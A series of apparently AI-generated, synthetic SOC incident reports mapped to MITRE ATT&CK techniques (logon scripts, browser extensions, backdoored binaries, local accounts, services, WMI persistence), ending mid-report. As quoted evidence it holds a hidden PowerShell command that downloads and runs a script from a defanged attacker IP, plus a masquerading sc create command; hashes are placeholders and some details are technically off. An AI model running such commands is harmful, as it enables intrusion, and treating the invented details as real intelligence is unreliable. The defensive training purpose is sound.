**Ticket:** SOC-2024-080
**Summary:** T1037 – Malicious Logon Script Added to Default Domain Policy
**Status:** RESOLVED
**Resolution:** MALICIOUS – Widespread Execution Contained
**Priority:** P1 – CRITICAL
**Labels:** T1037, logon-scripts, gpo, mdi, domain-compromise
**Components:** Identity-Management, Group-Policy, Incident-Response
—
**INCIDENT ANALYSIS REPORT**
**1. Initial Context:**
* **Detection Source:** Microsoft Defender for Identity.
* **Alert:** “Suspicious Group Policy Object Modification”.
* **GPO:** Default Domain Policy.
* **Modification:** Logon script added for all domain users.
* **Time:** 2024-02-15 08:30 EST.
* **Technique:** MITRE ATT&CK T1037.001 – Boot or Logon Initialization Scripts: Logon Script.
**2. Technical Analysis:**
* **Attack Chain:**
“`
07:45 – kjohnson’s credentials compromised via phishing
07:50 – Attacker logs into DC-01 from 45.134.225[.]78
08:00 – Attacker opens Group Policy Management Console
08:05 – Modifies Default Domain Policy
08:10 – Adds healthcheck.vbs as logon script
08:15 – GPO replicates to all domain controllers
08:16-08:30 – 347 users log on and execute script
08:30 – MDI alerts
“`
* **Malicious Script:**
– **File:** healthcheck.vbs
– **Location:** \\company.com\SYSVOL\company.com\scripts\
– **Function:** Runs hidden PowerShell to download update.ps1 from 185.143.221[.]89
– **update.ps1:** Later analysis shows it’s a Cobalt Strike downloader
* **Scope:**
– 3,200+ domain users targeted
– 347 users executed script before removal
– 12 users had successful C2 connections (firewall logs)
– No data exfiltration detected
* **Compromised Admin Account:**
– User: kjohnson (Domain Admin)
– Compromise method: Phishing (fake Office 365 login)
– No MFA (now enforced)
**3. Investigation Findings:**
* **Timeline:**
“`
07:45 – Credentials compromised
07:50 – Attacker logs into DC-01
08:00-08:15 – GPO modified
08:16-08:30 – Users log on, execute script
08:30 – Alert triggers
08:32 – SOC investigates
08:35 – GPO reverted
08:40 – Script deleted from SYSVOL
08:45 – kjohnson account disabled
“`
* **Affected Users:**
– 347 users executed script
– 12 had successful C2 connections
– All affected users contacted; passwords reset
* **Indicators of Compromise (IoCs):**
“`
GPO:
– Default Domain Policy modified
– Logon script: healthcheck.vbs
Files:
– \\company.com\SYSVOL\company.com\scripts\healthcheck.vbs (SHA256: a1b2c3…)
– update.ps1 (SHA256: b2c3d4…)
Network:
– Download URL: http://185.143.221[.]89/update.ps1
– C2: 185.143.221[.]89:443
Account:
– kjohnson (compromised)
“`
**4. Containment Actions:**
* **Immediate Actions:**
– Removed logon script from Default Domain Policy.
– Deleted healthcheck.vbs from SYSVOL.
– Disabled kjohnson account.
– Blocked malicious URLs at firewall and proxy.
– Reset krbtgt password (as precaution).
* **Affected User Remediation:**
– All 347 users contacted.
– Passwords reset for those with C2 connections (12 users).
– Endpoint scans on all affected workstations.
– No persistent malware found (scripts were downloaders only).
* **Domain Controller Hardening:**
– Restricted access to GPMC to specific admin workstations.
– Enabled auditing for all GPO changes.
– Implemented change management for GPO modifications.
**5. Root Cause Analysis:**
* **Primary Cause:** Domain Admin credentials compromised via phishing.
* **Contributing Factors:**
1. No MFA on admin accounts.
2. GPO modification allowed from any workstation.
3. No change management for GPO changes.
4. Logon scripts allowed to execute from network shares.
**6. Business Impact:**
* **Operational Impact:** 347 workstations potentially compromised; all cleaned.
* **Data Exposure:** None confirmed.
* **Productivity Impact:** 2-3 hours per affected user for password resets and scans.
* **Reputational Impact:** Internal only.
**7. Remediation & Prevention:**
**Completed Actions:**
– [x] Malicious GPO change reverted.
– [x] Compromised admin account secured.
– [x] Affected users remediated.
– [x] IOCs blocked.
**Technical Controls Enhanced:**
– [x] Enforced MFA for all admin accounts.
– [x] Implemented Privileged Access Workstations (PAWs) for admins.
– [x] Restricted GPO modification to specific admin workstations.
– [x] Enabled approval workflow for GPO changes.
– [x] Blocked PowerShell downloads from external URLs via GPO.
– [x] Enhanced monitoring for logon script modifications.
**8. Conclusion:**
An attacker compromised a Domain Admin and added a malicious logon script to the Default Domain Policy, affecting all domain users. 347 users executed the script before detection. MDI detected the anomalous GPO change within 15 minutes, enabling rapid containment. All affected systems were cleaned, and enhanced controls now prevent similar attacks.
**Closure Rationale:** GPO reverted; admin account secured; affected users remediated; controls enhanced.
**Analyst:** [Walter White], SOC Analyst
**Date:** 2024-02-15 11:00 EST
—
**End of Batch 8**
Ready for your next batch of prompts whenever you are.
Batch 9: Persistence & Privilege Escalation Incident Reports
Here are the next 5 detailed SOC incident reports.
41. T1176 – Browser Extensions (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-BROWSER-EXT-1176-7842
Alert Time: 2024-02-16 09:30:15 EST
Severity: MEDIUM (72/100)
Source: Microsoft Defender for Endpoint
Rule: “Suspicious Browser Extension Installed”
MITRE ATT&CK: T1176 – Browser Extensions
Alert Details:
Detection: Unauthorized browser extension installed with broad permissions
Host: SLS-WS-045 (Sales Department)
User: mwilson (Mike Wilson, Sales Rep)
Browser: Google Chrome
Time: 09:25 EST
Extension Details:
– Name: “Google Docs Offline Helper”
– ID: gdoc-offline-helper-12345
– Source: Chrome Web Store (external)
– Install Time: 09:24:30 EST
– Permissions Requested:
– Read and change all data on websites
– Access browsing history
– Manage downloads
– Communicate with cooperating native applications
Installation Source:
– User clicked pop-up on news-site during browsing
– Pop-up claimed “Chrome update required”
– Extension downloaded and installed automatically
Behavior Analysis:
– Extension has since:
– Exfiltrated browsing history to 185.143.221[.]89:8080
– Injected ads into search results
– Captured keystrokes on banking sites
– Downloaded additional JavaScript payloads
Threat Intelligence:
– Extension matches known “AdsExhaust” ad fraud campaign
– Used to steal credentials and browsing data
– Similar extensions installed on 3 other hosts
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed malicious extension installation
2. Extension Analysis
Extract and analyze extension code
Chrome Extension Inspector, Sandbox
Extension contains data exfiltration and keylogging code
3. Network Check
Check for data exfiltration
Zscaler Logs, Firewall
History data sent to 185.143.221[.]89:8080
4. Immediate Action
Remove extension from host
Chrome Management, PowerShell
Extension uninstalled from affected host
5. Enterprise-wide Check
Search for same extension on other hosts
Defender Advanced Hunting
3 other hosts with same extension found
6. User Notification
Notify affected users
Email, Teams
All users contacted; passwords reset
Jira Incident Report
Ticket: SOC-2024-081
Summary: T1176 – Malicious Browser Extension Installed via Fake Update
Status: RESOLVED
Resolution: MALICIOUS – Extension Removed
Priority: P2 – MEDIUM
Labels: T1176, browser-extensions, chrome, defender, data-exfiltration
Components: Endpoint-Security, Browser-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Suspicious Browser Extension Installed”.
Host: SLS-WS-045 (Sales Department, user mwilson).
Time: 2024-02-16 09:30 EST.
Technique: MITRE ATT&CK T1176 – Browser Extensions.
2. Technical Analysis:
Attack Chain:
09:20 – User visits news-site.com
09:21 – Malicious pop-up appears: “Chrome update required”
09:22 – User clicks “Update Now”
09:23 – Chrome downloads extension from Chrome Web Store (legitimate store, malicious extension)
09:24 – Extension installed with broad permissions
09:25 – Defender alerts based on behavior
Extension Analysis:
Name: “Google Docs Offline Helper” (masquerading)
ID: gdoc-offline-helper-12345
Permissions: Read/write to all sites, history, downloads, native messaging
Malicious Functions:
Exfiltrates browsing history to C2 every 5 minutes
Injects ads into search results (ad fraud)
Captures keystrokes on banking sites (Bank of America, Chase, etc.)
Downloads additional JavaScript from C2
Data Exfiltrated:
Browsing history (last 7 days)
Saved passwords (from browser password manager)
Cookies (session hijacking)
Scope:
4 hosts total affected (all in Sales department)
All installed same extension
3. Investigation Findings:
Timeline:
09:20 – User visits news site
09:24 – Extension installed
09:25 – Defender alert
09:27 – SOC investigation begins
09:30 – Host isolated; extension removed
09:45 – Enterprise-wide hunt finds 3 more hosts
Indicators of Compromise (IoCs):
Extension:
– Name: “Google Docs Offline Helper”
– ID: gdoc-offline-helper-12345
Network:
– C2: 185.143.221[.]89:8080
Hosts:
– SLS-WS-045, SLS-WS-046, SLS-WS-047, SLS-WS-048
4. Containment Actions:
Immediate Actions:
Removed extension from all affected hosts via PowerShell.
Cleared browser data (history, cookies, saved passwords).
Isolated hosts temporarily for scanning.
Blocked C2 IP at firewall.
User Remediation:
All affected users forced password reset.
Users educated on fake browser updates.
Browser settings reset to default.
Enterprise-wide:
Blocked extension ID via Chrome GPO (ExtensionInstallBlocklist).
Deployed Chrome cleanup tool to all hosts.
5. Root Cause Analysis:
Primary Cause: User clicked fake browser update pop-up.
Contributing Factors:
Chrome allowed extension install without admin approval.
No extension allowlist/blocklist in place.
User unaware of fake update scams.
6. Business Impact:
Operational Impact: 4 sales workstations offline for 2 hours.
Data Exposure: Browsing history, saved passwords (all passwords reset).
Financial Impact: Potential ad fraud costs (minimal).
7. Remediation & Prevention:
Completed Actions:
Extensions removed.
Passwords reset.
C2 blocked.
Technical Controls Enhanced:
Implemented Chrome extension allowlist (only approved extensions).
Blocked all extensions from external sources via GPO.
Enabled Defender alerting for any new extension installations.
Deployed browser isolation for high-risk browsing.
8. Conclusion:
Users in the Sales department installed a malicious Chrome extension after clicking a fake update pop-up. The extension exfiltrated browsing data and captured keystrokes. Defender detected the extension based on behavior, enabling rapid removal and password resets.
Closure Rationale: Extensions removed; passwords reset; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 11:00 EST
42. T1554 – Compromise Client Software Binary (Tripwire Detection)
Tripwire Alert Details
Alert ID: TRIPWIRE-BIN-MOD-1554-7842
Alert Time: 2024-02-16 14:15:33 EST
Severity: CRITICAL (95/100)
Source: Tripwire File Integrity Monitoring
Rule: “Critical System Binary Modified – Unexpected Change”
MITRE ATT&CK: T1554 – Compromise Client Software Binary
Alert Details:
File Integrity Alert:
Host: APP-SVR-023 (Application Server)
Path: C:\Program Files\VendorApp\vendor_service.exe
Expected Hash (baseline): 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
Current Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Modification Time: 14:10 EST
File Size: Same (2.1 MB)
Additional Details:
– File signed by “VendorApp Inc.” (valid signature)
– Signature timestamp: 14:09 EST (new)
– Process that modified file: powershell.exe (PID: 7842)
– User: SYSTEM (running as service)
Behavior Analysis:
– Original binary was replaced with backdoored version
– New binary contains same functionality + malicious code
– Malicious code connects to 185.143.221[.]89:443 on startup
– File signed with stolen or forged certificate
Threat Intelligence:
– VendorApp Inc. reported certificate theft last week
– Same backdoored binary seen in other attacks
– Affects version 3.2.1 of the software
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Tripwire alert
Tripwire Console
Confirmed binary hash mismatch
2. Binary Analysis
Analyze vendor_service.exe
CrowdStrike Sandbox, Any.Run
Binary contains backdoor; connects to C2
3. Process Investigation
Identify how binary was modified
CrowdStrike, PowerShell Logs
PowerShell downloaded and replaced binary
4. Immediate Containment
Stop service, isolate host
sc, CrowdStrike
Service stopped; host isolated
5. Restore Binary
Replace with clean version from backup
File Restore
Original binary restored from backup
6. Root Cause
Identify source of compromise
EDR, SIEM
PowerShell downloaded from malicious URL
Jira Incident Report
Ticket: SOC-2024-082
Summary: T1554 – Vendor Binary Replaced with Backdoored Version
Status: RESOLVED
Resolution: MALICIOUS – Binary Restored
Priority: P1 – CRITICAL
Labels: T1554, compromise-binary, file-integrity, tripwire, supply-chain
Components: Endpoint-Security, Application-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Tripwire File Integrity Monitoring.
Alert: “Critical System Binary Modified – Unexpected Change”.
Host: APP-SVR-023 (Application Server).
File: C:\Program Files\VendorApp\vendor_service.exe.
Time: 2024-02-16 14:15 EST.
Technique: MITRE ATT&CK T1554 – Compromise Client Software Binary.
2. Technical Analysis:
Attack Chain:
14:00 – Attacker gains access via compromised service account
14:02 – PowerShell downloads backdoored binary from 185.143.221[.]89
14:05 – PowerShell stops vendor_service
14:07 – PowerShell replaces vendor_service.exe with backdoored version
14:09 – Backdoored binary signed with stolen certificate
14:10 – PowerShell starts vendor_service
14:10 – Backdoored binary connects to C2
14:15 – Tripwire detects hash mismatch
Binary Analysis:
Original: vendor_service.exe (SHA256: 7a8b9c0d…)
Backdoored: vendor_service.exe (SHA256: a1b2c3d4…)
Certificate: Stolen from VendorApp Inc. (used to sign malicious binary)
Malicious Code: Added function that:
Connects to C2 at 185.143.221[.]89:443
Waits for commands (download/execute files, exfiltrate data)
Runs in context of service account (SYSTEM)
Impact:
Service running as SYSTEM
C2 connection established for 5 minutes before detection
No data exfiltration observed (DLP logs clean)
3. Investigation Findings:
Timeline:
14:00 – Attacker accesses server
14:02-14:10 – Binary replaced
14:10 – Service restarted
14:10-14:15 – C2 communication
14:15 – Tripwire alert
14:16 – SOC investigates
14:18 – Service stopped; host isolated
14:20 – Original binary restored
Indicators of Compromise (IoCs):
Files:
– Backdoored vendor_service.exe (SHA256: a1b2c3d4…)
Network:
– C2: 185.143.221[.]89:443
– Download URL: http://185.143.221[.]89/update.exe
Account:
– Compromised service account (later identified)
4. Containment Actions:
Immediate Actions:
Stopped vendor_service.
Isolated host via CrowdStrike.
Restored original binary from backup.
Blocked C2 IP at firewall.
Service Account Remediation:
Identified compromised service account (svc_app).
Reset password.
Audited account activity.
Application Review:
All VendorApp binaries checked on other servers (no other compromises).
Vendor notified of stolen certificate abuse.
5. Root Cause Analysis:
Primary Cause: Compromised service account used to replace binary.
Contributing Factors:
Service account had local admin on application server.
No file integrity monitoring on application binaries (until Tripwire).
Vendor certificate theft enabled binary signing.
6. Business Impact:
Operational Impact: Application server offline for 1 hour.
Data Exposure: None (C2 contained).
Reputational Impact: Vendor relationship affected.
7. Remediation & Prevention:
Completed Actions:
Binary restored.
Service account secured.
C2 blocked.
Technical Controls Enhanced:
Removed local admin from service accounts.
Implemented application whitelisting (CrowdStrike Falcon Prevent).
Enhanced file integrity monitoring for all critical binaries.
Deployed certificate pinning for vendor binaries.
8. Conclusion:
An attacker compromised a service account and replaced a vendor binary with a backdoored version signed with a stolen certificate. Tripwire detected the binary change within 5 minutes, enabling rapid containment. The original binary was restored, and the service account secured.
Closure Rationale: Binary restored; account secured; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 15:30 EST
43. T1136 – Create Account (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-CREATE-ACCT-1136-7842
Alert Time: 2024-02-16 11:30:45 EST
Severity: HIGH (85/100)
Source: Splunk Enterprise Security
Rule: “Local User Account Created on Multiple Systems”
MITRE ATT&CK: T1136.001 – Create Account: Local Account
Alert Details:
Correlated Events:
1. Windows Event ID 4720 (User Account Created):
– Time: 11:15-11:25 EST
– Host: Multiple (12 workstations)
– Account Created: “support_user”
– Created By: SYSTEM (via script)
– Event Count: 12 occurrences
2. Windows Event ID 4724 (Password Set):
– Time: 11:16-11:26 EST
– Same hosts
– Account: support_user
– Password set (complex, known to attacker)
3. Windows Event ID 4732 (User Added to Group):
– Time: 11:17-11:27 EST
– Account: support_user added to “Administrators” group
– On all 12 hosts
Detection Logic:
– Same account name created on multiple workstations within 10 minutes
– Account added to local Administrators group
– Created by SYSTEM (scripted)
– No change management ticket for user creation
Affected Hosts:
– Sales: 5 workstations
– Marketing: 3 workstations
– Engineering: 4 workstations
Additional Context:
– Account named “support_user” (common for attackers)
– No legitimate IT project for local account creation
– Script source identified as scheduled task
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk correlation
Splunk ES
Confirmed local account creation on 12 hosts
2. Account Remediation
Delete local accounts
PowerShell, Remote Management
support_user deleted from all hosts
3. Script Investigation
Find source of account creation
CrowdStrike, SCCM
Scheduled task “SystemMaintenance” created accounts
4. Malware Analysis
Analyze task script
CrowdStrike Sandbox
Script created local admin accounts for persistence
5. Host Remediation
Scan and clean affected hosts
CrowdStrike, Defender
All 12 hosts cleaned; no other malware found
6. Threat Hunting
Check for other accounts
Splunk, AD
No other unauthorized accounts found
Jira Incident Report
Ticket: SOC-2024-083
Summary: T1136 – Local Admin Accounts Created on 12 Workstations
Status: RESOLVED
Resolution: MALICIOUS – Accounts Deleted
Priority: P2 – MEDIUM
Labels: T1136, create-account, local-account, persistence, splunk
Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security correlation.
Alert: “Local User Account Created on Multiple Systems”.
Account Created: support_user (local admin on 12 workstations).
Time: 2024-02-16 11:30 EST.
Technique: MITRE ATT&CK T1136.001 – Create Account: Local Account.
2. Technical Analysis:
Attack Chain:
11:00 – Attacker compromises one workstation via phishing
11:05 – Attacker uses compromised host to deploy scheduled task via Group Policy
11:10 – Scheduled task “SystemMaintenance” created on all domain workstations
11:15 – Task executes on 12 workstations
11:15-11:17 – Creates support_user with password
11:17-11:27 – Adds user to local Administrators group
11:30 – Splunk correlation triggers
Account Details:
Username: support_user
Password: Complex (known to attacker)
Privileges: Local Administrator on each host
Purpose: Persistence and lateral movement
Scheduled Task Analysis:
Name: SystemMaintenance
Action: PowerShell script embedded in task
Script: Created local user, added to Administrators group
Trigger: One-time execution (now disabled)
Scope:
12 workstations affected
No servers affected
No domain accounts created
3. Investigation Findings:
Timeline:
11:00 – Initial compromise (phishing)
11:05 – Attacker deploys scheduled task via GPO
11:10 – Task propagates to workstations
11:15-11:27 – Accounts created
11:30 – Alert triggers
11:32 – SOC investigates
11:35 – Accounts deleted from all hosts
Indicators of Compromise (IoCs):
Account:
– support_user (local on 12 hosts)
Scheduled Task:
– Name: SystemMaintenance
– Action: PowerShell script
Network:
– Initial compromise IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Deleted support_user from all 12 hosts via PowerShell.
Removed scheduled task “SystemMaintenance” from all hosts.
Isolated initially compromised host.
Blocked attacker IP.
Host Remediation:
Scanned all 12 hosts (no other malware).
No reimage needed.
User Remediation:
Users of affected workstations notified.
Passwords reset as precaution.
5. Root Cause Analysis:
Primary Cause: Initial workstation compromise via phishing.
Contributing Factors:
Group Policy allowed scheduled task deployment from any workstation.
No monitoring for local account creation.
Local admin rights already present on workstations.
6. Business Impact:
Operational Impact: 12 workstations offline for 2 hours.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Accounts deleted.
Scheduled task removed.
Initial host cleaned.
Technical Controls Enhanced:
Restricted GPO deployment to authorized admin workstations.
Created SIEM alert for any local account creation.
Implemented LAPS (Local Administrator Password Solution) for unique local admin passwords.
8. Conclusion:
An attacker compromised a single workstation and used Group Policy to create local admin accounts on 12 workstations for persistence. Splunk detected the anomalous account creation, enabling rapid removal before the accounts could be used.
Closure Rationale: Accounts deleted; scheduled task removed; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 12:30 EST
44. T1543 – Create or Modify System Process (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-SYSTEM-PROCESS-1543-7842
Alert Time: 2024-02-16 15:45:22 EST
Severity: HIGH (88/100)
Source: Splunk Enterprise Security
Rule: “Windows Service Created with Unusual Binary Path”
MITRE ATT&CK: T1543.003 – Create or Modify System Process: Windows Service
Alert Details:
Correlated Events:
1. Windows Event ID 7045 (Service Installed):
– Time: 15:40 EST
– Host: FIN-SRV-089 (Finance Server)
– Service Name: “Windows Defender Advanced Threat Protection”
– Service Type: WIN32_OWN_PROCESS
– Start Type: Auto Start
– Service Account: LocalSystem
– Binary Path: C:\Windows\System32\svchost.exe -k “C:\ProgramData\Microsoft\Windows Defender\Platform\defender_update.dll”
2. Event ID 4688 (Process Creation):
– Time: 15:39 EST
– Process: sc.exe
– Command: sc create “Windows Defender Advanced Threat Protection” binPath= “C:\Windows\System32\svchost.exe -k C:\ProgramData\Microsoft\Windows Defender\Platform\defender_update.dll” start= auto
3. File Creation:
– File: C:\ProgramData\Microsoft\Windows Defender\Platform\defender_update.dll
– Time: 15:38 EST
– Created by: powershell.exe
Detection Logic:
– Service name mimics legitimate Windows Defender
– Binary path unusual for svchost (loads DLL from non-standard path)
– DLL in user-writable path (ProgramData)
– Service runs as SYSTEM
– Created shortly after suspicious PowerShell execution
Additional Context:
– Server: FIN-SRV-089 (critical financial server)
– No legitimate Windows updates scheduled
– PowerShell executed from user context (compromised admin account)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk correlation
Splunk ES
Confirmed malicious service creation
2. Service Analysis
Query service details
sc query, PowerShell
Service installed; binary path loads malicious DLL
3. DLL Analysis
Analyze defender_update.dll
CrowdStrike Sandbox
DLL contains backdoor; connects to C2
4. Immediate Action
Stop and delete service
sc, PowerShell
Service stopped and deleted
5. Host Isolation
Isolate server
CrowdStrike
Server quarantined
6. Account Investigation
Identify compromised account
Azure AD, CrowdStrike
Admin account credentials compromised via phishing
Jira Incident Report
Ticket: SOC-2024-084
Summary: T1543 – Malicious Windows Service Created on Finance Server
Status: RESOLVED
Resolution: MALICIOUS – Service Removed
Priority: P1 – CRITICAL
Labels: T1543, system-process, windows-service, persistence, splunk
Components: Endpoint-Security, Server-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security correlation.
Alert: “Windows Service Created with Unusual Binary Path”.
Host: FIN-SRV-089 (Critical Finance Server).
Service: “Windows Defender Advanced Threat Protection” (malicious).
Time: 2024-02-16 15:45 EST.
Technique: MITRE ATT&CK T1543.003 – Create or Modify System Process: Windows Service.
2. Technical Analysis:
Attack Chain:
15:30 – Admin account (jsmith) compromised via phishing
15:32 – Attacker RDPs to FIN-SRV-089 from 45.134.225[.]78
15:35 – PowerShell downloads defender_update.dll from 185.143.221[.]89
15:38 – DLL saved to C:\ProgramData\Microsoft\Windows Defender\Platform\
15:39 – sc.exe creates service with DLL load
15:40 – Service starts automatically
15:40 – DLL loads, connects to C2
15:45 – Splunk alert triggers
Service Details:
Name: Windows Defender Advanced Threat Protection (masquerading)
Binary Path: C:\Windows\System32\svchost.exe -k “C:\ProgramData\Microsoft\Windows Defender\Platform\defender_update.dll”
Account: LocalSystem (highest privileges)
Start Type: Auto (persistence across reboots)
DLL Analysis:
File: defender_update.dll (SHA256: b2c3d4e5f6…)
Function: When loaded by svchost, it:
Decrypts embedded payload
Establishes reverse shell to 194.165.16[.]89:443
Downloads additional tools (Mimikatz, etc.)
Scans for financial data
C2 Communication:
Established at 15:40
Beacon every 60 seconds
No data exfiltration before containment
3. Investigation Findings:
Timeline:
15:30 – Admin account compromised
15:32 – Attacker RDPs to server
15:35-15:38 – DLL downloaded
15:39 – Service created
15:40 – Service starts; C2 connects
15:45 – Alert triggers
15:46 – SOC investigates
15:48 – Service stopped and deleted
15:49 – Host isolated
Indicators of Compromise (IoCs):
Service:
– Name: Windows Defender Advanced Threat Protection
– Binary: C:\Windows\System32\svchost.exe -k “C:\ProgramData\Microsoft\Windows Defender\Platform\defender_update.dll”
Files:
– defender_update.dll (SHA256: b2c3d4e5…)
Network:
– C2: 194.165.16[.]89:443
– Download URL: http://185.143.221[.]89/update.dll
Account:
– jsmith (compromised admin)
4. Containment Actions:
Immediate Actions:
Stopped and deleted malicious service.
Isolated server via CrowdStrike.
Deleted defender_update.dll.
Blocked C2 IP at firewall.
Terminated attacker RDP session.
Account Remediation:
Reset jsmith’s password.
Enforced MFA for admin account.
Audited all admin activity.
Server Remediation:
Full scan (no other malware).
Verified no data exfiltration.
No reimage needed (malware removed).
5. Root Cause Analysis:
Primary Cause: Admin account credentials compromised via phishing.
Contributing Factors:
No MFA on admin account.
RDP allowed from internet (should be VPN only).
No application control blocking unknown DLLs.
6. Business Impact:
Operational Impact: Finance server offline for 2 hours.
Data Exposure: None (C2 blocked after 8 minutes).
7. Remediation & Prevention:
Completed Actions:
Service removed.
Host cleaned.
Admin account secured.
C2 blocked.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Moved RDP behind VPN only.
Implemented application control (CrowdStrike Falcon Prevent).
Enhanced service creation monitoring.
8. Conclusion:
An attacker compromised an admin account and created a malicious Windows service on a critical finance server. Splunk detected the anomalous service creation within 5 minutes, enabling rapid containment. No data exfiltration occurred.
Closure Rationale: Service removed; admin account secured; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 16:30 EST
45. T1546 – Event Triggered Execution (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-EVENT-TRIGGER-1546-7842
Alert Time: 2024-02-16 10:30:15 EST
Severity: HIGH (85/100)
Source: Sysmon (Event ID 1 – Process Creation)
Rule: “WMI Event Subscription – Suspicious Command Line”
MITRE ATT&CK: T1546.003 – Event Triggered Execution: WMI Event Subscription
Alert Details:
Event ID: 1 (Process Creation) – WMI Event Subscription
Time: 10:25 EST
Host: DEV-WS-089 (Development Workstation)
User: SYSTEM (via WMI)
Process Tree:
– Parent: WmiPrvSE.exe (PID: 784)
– Process: powershell.exe (PID: 4789)
– Command Line: powershell -WindowStyle Hidden -Command “Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1”
WMI Event Subscription Details:
– Namespace: root\subscription
– Filter: __EventFilter
– Name: “ProcessStartFilter”
– Query: “SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName=’notepad.exe'”
– Consumer: ActiveScriptEventConsumer
– Name: “PowerShellConsumer”
– Script: powershell -WindowStyle Hidden -Command “Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; …”
– Binding: __FilterToConsumerBinding
Detection Logic:
– WMI event subscription created to trigger when notepad.exe starts
– Triggers PowerShell download of malicious script
– WMI subscriptions rare on workstations
– Not triggered by user interaction
Additional Context:
– Subscription created at 10:20 EST
– No legitimate use of WMI event subscriptions on this host
– User had previously clicked phishing link
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed WMI event subscription
2. Subscription Removal
Remove WMI subscription
PowerShell, wbemtest
WMI filter, consumer, binding removed
3. Script Analysis
Analyze update.ps1
CrowdStrike Sandbox
Script downloads Cobalt Strike beacon
4. Host Scan
Check for other malware
CrowdStrike
No other persistence found
5. User Interview
Contact user
Teams, Phone
User clicked phishing link earlier
6. Threat Hunting
Check other hosts for same subscription
Splunk, Sysmon
No other hosts affected
Jira Incident Report
Ticket: SOC-2024-085
Summary: T1546 – WMI Event Subscription for Persistence
Status: RESOLVED
Resolution: MALICIOUS – Subscription Removed
Priority: P2 – MEDIUM
Labels: T1546, event-triggered-execution, wmi, persistence, sysmon
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation via WMI).
Alert: “WMI Event Subscription – Suspicious Command Line”.
Host: DEV-WS-089 (Development Department).
Time: 2024-02-16 10:30 EST.
Technique: MITRE ATT&CK T1546.003 – Event Triggered Execution: WMI Event Subscription.
2. Technical Analysis:
Attack Chain:
09:30 – User clicks phishing link earlier
09:35 – Malicious script runs, installs WMI event subscription
09:40 – WMI subscription created
10:25 – User opens notepad.exe (unrelated)
10:25 – WMI subscription triggers PowerShell
10:25 – PowerShell downloads update.ps1 from 185.143.221[.]89
10:30 – Sysmon detects PowerShell from WmiPrvSE.exe
WMI Subscription Details:
Trigger: Win32_ProcessStartTrace WHERE ProcessName=’notepad.exe’
Action: Run PowerShell script downloading malicious payload
Persistence: Survives reboots; triggers whenever notepad runs
Script Analysis:
update.ps1 (SHA256: c3d4e5f6…)
Downloads Cobalt Strike beacon from same C2
Beacon connects to 185.143.221[.]89:443
User Activity:
User clicked phishing link earlier (fake “security update”)
Downloaded and ran initial script
Was unaware of WMI subscription
3. Investigation Findings:
Timeline:
09:30 – User clicks phishing link
09:35 – Initial script runs
09:40 – WMI subscription created
10:25 – User opens notepad.exe (normal work)
10:25 – PowerShell triggers, downloads payload
10:30 – Sysmon alerts
10:32 – SOC investigates
10:35 – WMI subscription removed
Indicators of Compromise (IoCs):
WMI:
– Filter: ProcessStartFilter
– Consumer: PowerShellConsumer
– Query: SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName=’notepad.exe’
Network:
– C2: 185.143.221[.]89:443
– Download URL: http://185.143.221[.]89/update.ps1
Files:
– update.ps1 (SHA256: c3d4e5f6…)
4. Containment Actions:
Immediate Actions:
Removed WMI event subscription using PowerShell.
Deleted any downloaded scripts.
Isolated host temporarily.
Blocked C2 IP at firewall.
Host Remediation:
Full scan (no other malware).
No reimage needed.
User Remediation:
Password reset.
Educated on phishing risks.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link, leading to initial compromise.
Contributing Factors:
WMI event subscriptions allowed (no restrictions).
No monitoring for WMI subscriptions (until Sysmon).
User lacked recent training.
6. Business Impact:
Operational Impact: Developer workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
WMI subscription removed.
Host cleaned.
User educated.
C2 blocked.
Technical Controls Enhanced:
Created SIEM alert for any new WMI event subscriptions.
Restricted WMI access via GPO.
Deployed PowerShell logging for WMI activities.
8. Conclusion:
An attacker used a WMI event subscription to establish persistence, triggering a PowerShell download whenever the user opened notepad.exe. Sysmon detected the anomalous process creation, enabling rapid removal before the payload could fully execute.
Closure Rationale: WMI subscription removed; host cleaned; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 11:30 EST
End of Batch 9
Ready for your next batch of prompts whenever you are.
Batch 10: Privilege Escalation & Defense Evasion Incident Reports
Here are the next 5 detailed SOC incident reports.
46. T1134 – Access Token Manipulation (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-TOKEN-MANIP-1134-7842
Alert Time: 2024-02-17 09:30:22 EST
Severity: CRITICAL (92/100)
Source: CrowdStrike Falcon EDR
